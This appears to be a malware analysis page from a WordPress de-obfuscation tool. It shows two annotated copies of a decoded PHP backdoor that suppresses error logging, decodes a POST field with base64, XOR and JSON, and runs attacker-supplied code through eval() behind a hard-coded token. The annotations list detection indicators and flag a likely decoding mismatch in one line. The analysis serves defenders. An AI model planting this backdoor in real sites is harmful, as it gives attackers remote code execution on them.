De-obfuscate PHP malware, viruses and tampering code found on WordPress sites back into the original, readable code.
*Please note that not all obfuscation codes can be decoded.
<?php
/*
 * Analyst summary of the submitted sample (claims limited to what the code below shows):
 * a small backdoor that reads one HTTP POST field, decodes it, and hands
 * attacker-supplied text to eval() when the request carries a hard-coded token.
 * Strings worth searching a site for: "5p1n-th3-51lly-5tr1ng5", eval() fed from
 * $_POST, and @ini_set("error_log", NULL) at the top of a file.
 */

// Long character string; not read anywhere else in the visible code.
// NOTE(review): presumably a lookup alphabet used by the obfuscation layer - confirm.
$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";

// Table of opaque keys -> function names, so functions can be called as $GLOBALS[key](...).
$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";
$GLOBALS["z2a2c835b"] = "ae858b";

// Error logging is switched off and the execution time limit removed; "@" hides any warning.
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);

$k6de1cb3 = NULL;
$v24368366 = NULL;

// Repeating-key XOR of the first argument with the second.
function ae858b($k6de1cb3, $rbf8cd4) {
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}

// Two XOR passes: first with the hard-coded string, then with the caller's key.
function c484($k6de1cb3, $rbf8cd4) {
    return ae858b(ae858b($k6de1cb3, "5p1n-th3-51lly-5tr1ng5"), $rbf8cd4);
}

// Always entered here ($k6de1cb3 is still NULL); keeps the last POST field's value and name.
if (!$k6de1cb3) {
    foreach ($_POST as $rbf8cd4 => $n18fd12d) {
        $k6de1cb3 = $n18fd12d;
        $v24368366 = $rbf8cd4;
    }
}

// NOTE(review): the keys "x800cc9", "qy09b8" and "oy47y6y4" are not defined in the table
// above (it has "n800cc9", "q109b8", "o1471614"); likely a decoder artifact - confirm
// against the raw file before drawing conclusions from this line.
$k6de1cb3 = @$GLOBALS["x800cc9"]($GLOBALS["qy09b8"]($GLOBALS["oy47y6y4"]($k6de1cb3), $v24368366), true);

// Token check (loose ==) on "ak"; when "a" is "&" the "L" field is executed as PHP code.
// The script exits after a token match whether or not eval() ran.
if (isset($k6de1cb3["ak"]) && "5p1n-th3-51lly-5tr1ng5" == $k6de1cb3["ak"]) {
    if ($k6de1cb3["a"] == "&") {
        eval($k6de1cb3["L"]);
    }
    exit;
}
<?php
/*
 * Analyst annotation of the decoded sample. Every statement is unchanged; only
 * line breaks and comments were added.
 *
 * What the visible code does:
 *   1. Disables PHP error logging and removes the execution time limit.
 *   2. Takes one field from the HTTP POST body: its value is the payload, its
 *      name is used as a key.
 *   3. Decodes the payload into an array and, if the array carries the
 *      hard-coded token below, passes a field of that array to eval().
 *
 * Why it matters to a defender: step 3 is arbitrary PHP execution controlled by
 * the request body. The code that was executed is not stored in this file, so
 * deleting the file does not show what was run; treat the site as compromised
 * and review other files, accounts and credentials as well.
 *
 * Strings usable as search/detection indicators, all taken from this listing:
 *   - "5p1n-th3-51lly-5tr1ng5" (XOR key and request token)
 *   - eval() applied to data derived from $_POST
 *   - @ini_set("error_log", NULL) / @ini_set("log_errors", 0) at the top of a file
 */

// Long character string stored under an opaque key. Nothing else in the visible
// code reads it.
// NOTE(review): presumably a lookup alphabet left over from the obfuscation
// layer - confirm against the raw sample.
$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";

// Indirection table: opaque key -> function name. Calling through
// $GLOBALS[key](...) keeps names such as base64_decode out of the call site,
// which defeats naive keyword scanning of that line.
$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";       // the double-XOR helper defined below
$GLOBALS["z2a2c835b"] = "ae858b";  // the single-XOR helper defined below

// Anti-forensics and robustness: no error log target, no error logging, no time
// limit. The "@" operator suppresses any warning these calls would raise.
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);

// Payload and key start out empty.
$k6de1cb3 = NULL;
$v24368366 = NULL;

/**
 * Repeating-key XOR.
 *
 * Walks the first argument byte by byte and XORs each byte with the next byte
 * of the second argument, restarting the key when it runs out. The outer loop
 * has no increment of its own; the data index is advanced inside the inner loop.
 * Returns the resulting byte string.
 */
function ae858b($k6de1cb3, $rbf8cd4) {
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}

/**
 * Double XOR: first with the hard-coded string "5p1n-th3-51lly-5tr1ng5", then
 * with the key supplied by the caller. Returns the result of the second pass.
 */
function c484($k6de1cb3, $rbf8cd4) {
    return ae858b(ae858b($k6de1cb3, "5p1n-th3-51lly-5tr1ng5"), $rbf8cd4);
}

// $k6de1cb3 was set to NULL above and nothing in between changes it, so this
// branch is always taken in the code as shown. Each iteration overwrites the
// previous one, so after the loop the variables hold the value and the name of
// the last POST field; with an empty POST body both stay NULL.
if (!$k6de1cb3) {
    foreach ($_POST as $rbf8cd4 => $n18fd12d) {
        $k6de1cb3 = $n18fd12d;
        $v24368366 = $rbf8cd4;
    }
}

// Decode step, called through the indirection table with the boolean `true` as
// the last argument of the outermost call.
// NOTE(review): the three keys used here ("x800cc9", "qy09b8", "oy47y6y4") are
// not the ones registered above ("n800cc9", "q109b8", "o1471614"). As printed
// these entries are undefined, so the call could not succeed; this looks like a
// transcription artifact of the de-obfuscator rather than the sample's real
// text - confirm against the raw file. By position the chain would be
// base64 decode -> c484() keyed with the POST field name -> JSON decode to an array.
$k6de1cb3 = @$GLOBALS["x800cc9"]($GLOBALS["qy09b8"]($GLOBALS["oy47y6y4"]($k6de1cb3), $v24368366), true);

// Gate and execution. The decoded array must contain "ak" equal (loose ==) to
// the hard-coded token. If its "a" field equals "&", the "L" field is run as PHP
// code via eval(). After a token match the script exits either way, so nothing
// that follows this snippet in the infected file is executed for that request.
if (isset($k6de1cb3["ak"]) && "5p1n-th3-51lly-5tr1ng5" == $k6de1cb3["ak"]) {
    if ($k6de1cb3["a"] == "&") {
        eval($k6de1cb3["L"]);
    }
    exit;
}